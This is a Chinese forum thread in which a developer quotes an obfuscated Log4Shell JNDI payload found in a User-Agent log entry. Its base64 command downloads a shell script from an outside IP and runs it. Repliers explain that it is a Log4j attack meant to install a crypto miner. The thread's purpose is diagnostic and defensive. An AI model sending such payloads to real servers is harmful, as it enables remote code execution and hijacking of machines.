
年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}') 知道这是干嘛的吗

1 ThirdFlame 2022 年 2 月 10 日 log4shell |
3 zhazi 2022 年 2 月 10 日 |
4 maichaide 2022 年 2 月 10 日 下载脚本开启探矿服务 |
5 muzuiget 2022 年 2 月 10 日 Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。 |
6 yundun2021 2022 年 2 月 10 日 有条件可以上 WAF |
7 yu1u 2022 年 2 月 10 日 log4j 漏洞攻击 |
8 0x73346b757234 2022 年 2 月 10 日 对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。 |
11 kaka6 OP 又收到不少的 User-Agent: Go-http-client/1.1 python-requests/2.20.1 curl/7.75.0 而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客 |